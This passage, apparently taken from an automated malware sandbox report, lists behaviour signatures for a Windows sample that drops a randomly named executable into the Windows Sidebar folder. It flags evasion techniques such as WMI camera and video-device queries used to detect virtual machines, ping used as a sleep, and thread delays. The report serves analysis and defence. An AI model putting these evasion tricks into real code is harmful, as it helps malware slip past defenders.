                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Uses ping.exe to sleep
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeMemory allocated: 1680000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeMemory allocated: 1B630000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeMemory allocated: 1A9A0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC6E6CA9 rdtsc 0_2_00007FFAAC6E6CA9
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599641Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599531Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599422Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599313Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599188Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599063Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598907Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598782Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598657Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598532Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598407Jump to behavior
